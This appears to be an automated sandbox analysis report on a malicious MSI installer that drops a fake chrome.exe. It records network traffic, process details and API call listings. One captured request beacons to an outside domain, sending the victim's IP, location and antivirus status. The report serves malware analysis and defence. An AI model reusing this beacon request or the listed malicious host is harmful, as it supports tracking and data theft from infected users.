                                                  2024-08-23 17:16:18 UTC1369INData Raw: 70 61 6e 3e 46 6f 72 6d 61 74 20 63 6f 64 65 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 6d 65 6e 75 49 74 65 6d 20 63 6f 70 79 43 6f 64 65 42 74 6e 27 20 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 6d 69 63 6e 20 73 6d 49 63 6e 27 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 70 79 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 43 6f 70 79 20 63 6f 6e 74 65 6e 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 27 6d 6f 64
                                                  Data Ascii: pan>Format code</span> </div> <div class='menuItem copyCodeBtn' > <span class='micn smIcn'> copy </span> <span>Copy content</span> </div> </div> </button> <button class='mod


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  1 | 192.168.2.4 | 49732 | 34.117.59.81 | 443 | 4820 | C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-08-23 17:16:18 UTC | 250 | OUT | GET /json HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip
                                                  Host: ipinfo.io
                                                  User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36
                                                  Connection: Keep-Alive
                                                  2024-08-23 17:16:19 UTC | 345 | IN | HTTP/1.1 200 OK
                                                  access-control-allow-origin: *
                                                  Content-Length: 319
                                                  content-type: application/json; charset=utf-8
                                                  date: Fri, 23 Aug 2024 17:16:19 GMT
                                                  x-content-type-options: nosniff
                                                  via: 1.1 google
                                                  strict-transport-security: max-age=2592000; includeSubDomains
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Connection: close
                                                  2024-08-23 17:16:19 UTC | 319 | IN | Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  2 | 192.168.2.4 | 49734 | 198.20.110.106 | 443 | 4820 | C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-08-23 17:16:20 UTC | 438 | OUT | GET /wp-admin/js/cnt/system/conta.php?IDR=8.46.123.33&PC=818225&DTF=23/08/2024%2013:16:15&UF=New%20York&CAP=New%20York%20City&APP=%20Nao%20tem%20aplicativo&ANT=Topaz%20OFD%20Nao&SPM=AGOSTO HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip
                                                  Host: www.fuhnwijude.com
                                                  User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36
                                                  Connection: Keep-Alive
                                                  2024-08-23 17:16:20 UTC | 471 | IN | HTTP/1.1 302 Found
                                                  Connection: close
                                                  x-powered-by: PHP/7.4.33
                                                  location: http://google.com/
                                                  content-type: text/html; charset=UTF-8
                                                  content-length: 0
                                                  date: Fri, 23 Aug 2024 17:16:20 GMT
                                                  server: LiteSpeed
                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                  vary: User-Agent
                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  3 | 192.168.2.4 | 49740 | 216.58.212.164 | 443 | 4820 | C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-08-23 17:16:22 UTC | 334 | OUT | GET /?gws_rd=ssl HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip
                                                  User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36
                                                  Connection: Keep-Alive
                                                  Host: www.google.com
                                                  Cookie: AEC=AVYB7cpAq0GIpRy9NZo9DvJvUBBN_YmsGsCKv3vpUtvLYDCsdqWAVvUU9g
                                                  2024-08-23 17:16:22 UTC | 1067 | IN | HTTP/1.1 200 OK
                                                  Content-Type: text/html; charset=UTF-8
                                                  Strict-Transport-Security: max-age=31536000
                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-bQdFvwYzptPWBmgDKdBcfw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                  Permissions-Policy: unload=()
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Date: Fri, 23 Aug 2024 17:16:22 GMT
                                                  Server: gws
                                                  Cache-Control: private
                                                  X-XSS-Protection: 0
                                                  X-Frame-Options: SAMEORIGIN
                                                  Expires: Fri, 23 Aug 2024 17:16:22 GMT
                                                  Set-Cookie: NID=517=fqEQ_aSe3UsEvjj_RqHsv1aS3klaKfPnT_JkMmqXuszL2pJt-nGvytW-hQIj1nAdAhNOWUgrcdswCwgDejxb1M505gGXaJM_yGq9Int348bp60NEJXf2roQzKMIFy7-2dnJKNRrDCjSzbaknabgV0VKuL4MD96ZJJGUpOT49afDkah_3Kfrm3glr; expires=Sat, 22-Feb-2025 17:16:22 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Accept-Ranges: none
                                                  Vary: Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked


                                                  Target ID:0
                                                  Start time:13:16:00
                                                  Start date:23/08/2024
                                                  Path:C:\Windows\System32\msiexec.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\nf963-5d-qns6-w812.msi"
                                                  Imagebase:0x7ff7fe290000
                                                  File size:69'632 bytes
                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:13:16:00
                                                  Start date:23/08/2024
                                                  Path:C:\Windows\System32\msiexec.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                  Imagebase:0x7ff7fe290000
                                                  File size:69'632 bytes
                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:2
                                                  Start time:13:16:01
                                                  Start date:23/08/2024
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E1CF8BADC61849C4C5214BC163FD5145
                                                  Imagebase:0x5e0000
                                                  File size:59'904 bytes
                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:13:16:07
                                                  Start date:23/08/2024
                                                  Path:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Imagebase:0xd30000
                                                  File size:2'252'904 bytes
                                                  MD5 hash:DD36EA28C576FB0AD109B42D3D6C9F96
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:13:16:09
                                                  Start date:23/08/2024
                                                  Path:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Imagebase:0xd30000
                                                  File size:2'252'904 bytes
                                                  MD5 hash:DD36EA28C576FB0AD109B42D3D6C9F96
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:13:16:11
                                                  Start date:23/08/2024
                                                  Path:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Imagebase:0xd30000
                                                  File size:2'252'904 bytes
                                                  MD5 hash:DD36EA28C576FB0AD109B42D3D6C9F96
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:13:16:12
                                                  Start date:23/08/2024
                                                  Path:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Imagebase:0xd30000
                                                  File size:2'252'904 bytes
                                                  MD5 hash:DD36EA28C576FB0AD109B42D3D6C9F96
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:13:16:13
                                                  Start date:23/08/2024
                                                  Path:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Imagebase:0xd30000
                                                  File size:2'252'904 bytes
                                                  MD5 hash:DD36EA28C576FB0AD109B42D3D6C9F96
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:13:16:14
                                                  Start date:23/08/2024
                                                  Path:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Imagebase:0xc40000
                                                  File size:2'252'904 bytes
                                                  MD5 hash:DD36EA28C576FB0AD109B42D3D6C9F96
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Reputation:low
                                                  Has exited:false


                                                    Execution Graph

                                                    Execution Coverage:0.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:13.3%
                                                    Total number of Nodes:368
                                                    Total number of Limit Nodes:19

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32 ref: 00DF6DA5
                                                    • __aulldiv.LIBCMT ref: 00DF729D
                                                    • TryAcquireSRWLockExclusive.KERNEL32 ref: 00DF7319
                                                    • ReleaseSRWLockExclusive.KERNEL32 ref: 00DF7341
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF7366
                                                    • TlsAlloc.KERNEL32 ref: 00DF739A
                                                      • Part of subcall function 00D39990: LoadLibraryW.KERNELBASE(bcryptprimitives.dll,00000000,?,?,00DF6F07,?,?,?), ref: 00D399BC
                                                      • Part of subcall function 00D39990: GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 00D399CC
                                                      • Part of subcall function 00DBCF90: TryAcquireSRWLockExclusive.KERNEL32(00000040,00000000,00000040,00000000,?,00DF73D2), ref: 00DBCFA1
                                                      • Part of subcall function 00DBCF90: AcquireSRWLockExclusive.KERNEL32(00000040,?,00DF73D2), ref: 00DBCFDA
                                                      • Part of subcall function 00D9A660: TryAcquireSRWLockExclusive.KERNEL32(00EF10F0), ref: 00D9A694
                                                      • Part of subcall function 00D9A660: ReleaseSRWLockExclusive.KERNEL32(00EF10F0), ref: 00D9A6B0
                                                    • ReleaseSRWLockExclusive.KERNEL32 ref: 00DF73F6
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00DF741F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$Release$AddressAllocLibraryLoadProc__aulldiv
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at
                                                    • API String ID: 1366307475-4189810390
                                                    • Opcode ID: 2350d93eea145d90b5365f01fa799fab8a49e8b2a0741044c0bad553afc86ac4
                                                    • Instruction ID: 37b1b6cdbaf54951f246a3cb17bb3ffccb947beb4292149d9bb50b85a27bdda6
                                                    • Opcode Fuzzy Hash: 2350d93eea145d90b5365f01fa799fab8a49e8b2a0741044c0bad553afc86ac4
                                                    • Instruction Fuzzy Hash: 93029171904B848ED312DF398444356FBE2FF95340F04CB2EE9DA67251DB74989A8B52

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBA835
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DBA936
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DBA97F
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBA9A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: first$second
                                                    • API String ID: 17069307-3095674784
                                                    • Opcode ID: 187092aad5f17a447f65f63f90be93aab932ffcc48bbffc4c0b54f9d1ce3ac37
                                                    • Instruction ID: f7562939792ac87dcb132c1e5e060272ff64aaa07b654bd5edaad34c34c9f658
                                                    • Opcode Fuzzy Hash: 187092aad5f17a447f65f63f90be93aab932ffcc48bbffc4c0b54f9d1ce3ac37
                                                    • Instruction Fuzzy Hash: 3EB12331A00701DFC7148F29C5406AAB7E2EFD4310B29C669F89A9B295D731DC42DBA2

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadLibraryW.KERNELBASE(bcryptprimitives.dll,00000000,?,?,00DF6F07,?,?,?), ref: 00D399BC
                                                    • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 00D399CC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ProcessPrng$bcryptprimitives.dll
                                                    • API String ID: 2574300362-2667675608
                                                    • Opcode ID: f14f3843dd05a5161a2dceedddc51dcf0a1cab14cd6e4646435bb06f5836003c
                                                    • Instruction ID: 108d5d79ca6f2b095b9eb237ff9a409606a4836713bb004a3add18459712007a
                                                    • Opcode Fuzzy Hash: f14f3843dd05a5161a2dceedddc51dcf0a1cab14cd6e4646435bb06f5836003c
                                                    • Instruction Fuzzy Hash: 6131E774A0020EAFDB04DF65D855A5ABBB9FF89310F08C52DF8086F311E770A985CBA0

                                                    Control-flow Graph

                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00F03578,00D36A79,?,?,00DBE05C,?,-00000048,?), ref: 00D36AEC
                                                    • ReleaseSRWLockExclusive.KERNEL32(00F03578,?,?,?,?,?,?,?,00DBE05C,?,-00000048,?), ref: 00D36B6D
                                                      • Part of subcall function 00D39990: LoadLibraryW.KERNELBASE(bcryptprimitives.dll,00000000,?,?,00DF6F07,?,?,?), ref: 00D399BC
                                                      • Part of subcall function 00D39990: GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 00D399CC
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireAddressLibraryLoadProcRelease
                                                    • String ID:
                                                    • API String ID: 969684755-0
                                                    • Opcode ID: 1e36830e5300080cd79b18d81774a8ddf829615f8b49ba5b673bd1a2565619d4
                                                    • Instruction ID: e47608b4d9a6b8373cf7cbc53a360de80231c6e0cc63ebb40d5b1ff6712ad92d
                                                    • Opcode Fuzzy Hash: 1e36830e5300080cd79b18d81774a8ddf829615f8b49ba5b673bd1a2565619d4
                                                    • Instruction Fuzzy Hash: 7C31BB71E002159FD310DF2AEC40626F7EAFBC8310F49812DE895E73A1E6709D45EB91

                                                    Control-flow Graph

                                                    APIs
                                                    • ConvertThreadToFiberEx.KERNEL32(00000000,00000001), ref: 00D40A5C
                                                    • CreateFiberEx.KERNELBASE(00000000,00400000,00000001,00D409F0,?), ref: 00D40A85
                                                    • SwitchToFiber.KERNEL32(00000000), ref: 00D40A96
                                                    • DeleteFiber.KERNEL32(00000000), ref: 00D40A9D
                                                    • ConvertFiberToThread.KERNEL32 ref: 00D40AA3
                                                    • GetLastError.KERNEL32 ref: 00D410ED
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Fiber$ConvertThread$CreateDeleteErrorLastSwitch
                                                    • String ID:
                                                    • API String ID: 3693343117-0
                                                    • Opcode ID: a87e30cb9f83e54ffe0c5153c62cfc7a47ff9ed4b5bf1b409bd2093d6aa9f2bc
                                                    • Instruction ID: f94b0c01cdf63d801418a07cdf5e6b4e9c4cd6c2b6620c59babd214abe105035
                                                    • Opcode Fuzzy Hash: a87e30cb9f83e54ffe0c5153c62cfc7a47ff9ed4b5bf1b409bd2093d6aa9f2bc
                                                    • Instruction Fuzzy Hash: 550162756403449FE7209F71EC89B6677A4FB04305F18443DF50BEA291DA75E849CB22

                                                    Control-flow Graph

                                                    APIs
                                                    • ReleaseSRWLockExclusive.KERNEL32(00000001,00000001), ref: 00DBAF04
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBAF67
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: first$second
                                                    • API String ID: 17069307-3095674784
                                                    • Opcode ID: 9644d76b3e557d744bcf709a5655c47fdaa42e911e5ba1dcfae07345d831f2cd
                                                    • Instruction ID: f71490b89a62018c1be34442aa9da2a26a1fde98bdd76f1094b05091a528eeac
                                                    • Opcode Fuzzy Hash: 9644d76b3e557d744bcf709a5655c47fdaa42e911e5ba1dcfae07345d831f2cd
                                                    • Instruction Fuzzy Hash: 8C510471600742DBD7108F29C4806B6FBE2EFC8314F18C67EF49A8B299D735D84287A2

                                                    Control-flow Graph

                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(?,?,00001000,00000020), ref: 00D36A02
                                                    • GetLastError.KERNEL32 ref: 00D36A22
                                                    • VirtualFree.KERNEL32(?,?,00004000), ref: 00D36A54
                                                    • GetLastError.KERNEL32 ref: 00D36A5E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastVirtual$AllocFree
                                                    • String ID:
                                                    • API String ID: 2325269287-0
                                                    • Opcode ID: 77613445567b07231a26d258e67649cc6fdf3ddf09f48567c04a418c0d2e33ac
                                                    • Instruction ID: 6b6415494317b9b798e1db0ff728bf928e6bec4f63ce24f5044cf2fcd442abcc
                                                    • Opcode Fuzzy Hash: 77613445567b07231a26d258e67649cc6fdf3ddf09f48567c04a418c0d2e33ac
                                                    • Instruction Fuzzy Hash: 4B01A270700189BBEB245B62DC5C76A375DEB56796F1CC838FA06BA180D674DC408575

                                                    Control-flow Graph

                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(656D6DA9,00000000,-00000004,?,?,?,00D49E75,00EDFE90,-00000004,00000000), ref: 00DBA171
                                                    • ReleaseSRWLockExclusive.KERNEL32(00D49E75,00000001,?,00D49E75,00EDFE90,-00000004,00000000), ref: 00DBA1E3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID:
                                                    • API String ID: 17069307-0
                                                    • Opcode ID: 5ef8575474eda1cce7b1aabcbaf8e9f5e48b81c8c8e833e6d8f420050c7db516
                                                    • Instruction ID: c288eee0f18588472c2648666a3400a964c2894ee8774254029345ffee1b045a
                                                    • Opcode Fuzzy Hash: 5ef8575474eda1cce7b1aabcbaf8e9f5e48b81c8c8e833e6d8f420050c7db516
                                                    • Instruction Fuzzy Hash: 0F81EB70600201CFDB68CF2DC884BB5B7F5FF41364F0885A9E86A8B696D735E845CB61

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00D36AD0: TryAcquireSRWLockExclusive.KERNEL32(00F03578,00D36A79,?,?,00DBE05C,?,-00000048,?), ref: 00D36AEC
                                                      • Part of subcall function 00D36AD0: ReleaseSRWLockExclusive.KERNEL32(00F03578,?,?,?,?,?,?,?,00DBE05C,?,-00000048,?), ref: 00D36B6D
                                                    • GetCurrentProcess.KERNEL32(?,?,00DBE05C,?,-00000048,?), ref: 00D36A9E
                                                    • IsWow64Process.KERNEL32(00000000,00EF2550,?,00DBE05C,?,-00000048,?), ref: 00D36AAA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLockProcess$AcquireCurrentReleaseWow64
                                                    • String ID:
                                                    • API String ID: 2898688079-0
                                                    • Opcode ID: a029f129578b6ea87f8ee35dc335decfb79c93c2f4757a0cfab23af7d0a5906e
                                                    • Instruction ID: 61ab1dad5adfc8c6a1132a6e4f4a68b418354817a80c2e65c13d4c9ae3126073
                                                    • Opcode Fuzzy Hash: a029f129578b6ea87f8ee35dc335decfb79c93c2f4757a0cfab23af7d0a5906e
                                                    • Instruction Fuzzy Hash: 1BE0657160021A6BC2105B7D6C4972137D8A744755F1DC118FA09F7294F750EC0993B2

                                                    Control-flow Graph

                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00E28151,00E58715,?,00000000,?,00E7476B,?,?), ref: 00E4361F
                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E7476B,?,?), ref: 00E436C1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: 844524f6b58c680a952cfa4c058a056894216cf55678e86fc66eee4764087d5a
                                                    • Instruction ID: e81cd3ab95d7a37efd350c095f92855477292974dec19917c53b202a12fda0a1
                                                    • Opcode Fuzzy Hash: 844524f6b58c680a952cfa4c058a056894216cf55678e86fc66eee4764087d5a
                                                    • Instruction Fuzzy Hash: 00116630B042177ED321BB7AFCC6EAB36DC9B407AC7252274F118B62F1DA508F084120

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: ___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 3903695350-0
                                                    • Opcode ID: 1b8e3de17a4181de67a2670a70573f76f6783f5fbbe3d2eeb02e224c7e80adc5
                                                    • Instruction ID: 044a7ae8cc0846e6776b08012aa29b46ca2409f0fd063e48e18261f6940a0699
                                                    • Opcode Fuzzy Hash: 1b8e3de17a4181de67a2670a70573f76f6783f5fbbe3d2eeb02e224c7e80adc5
                                                    • Instruction Fuzzy Hash: 4B319C71A082019FEB30AE79EC05B9AB3E8AF04718F106469F498F71A1DB70ED80DB54
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000004,?,?), ref: 00D382EC
                                                    • GetLastError.KERNEL32 ref: 00D38301
                                                    • SetLastError.KERNEL32(00000000), ref: 00D3830F
                                                    • GetLastError.KERNEL32 ref: 00D38332
                                                    • SetLastError.KERNEL32(00000000), ref: 00D38343
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D3851D
                                                    • K32GetModuleInformation.KERNEL32(00000000,?,?,0000000C,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D38530
                                                    • GetLastError.KERNEL32(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D3856F
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D3857D
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D38591
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D385B1
                                                    • GetSystemInfo.KERNEL32(?), ref: 00D38686
                                                    • GetLastError.KERNEL32(00ED1384,..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type,?,?,?), ref: 00D386B8
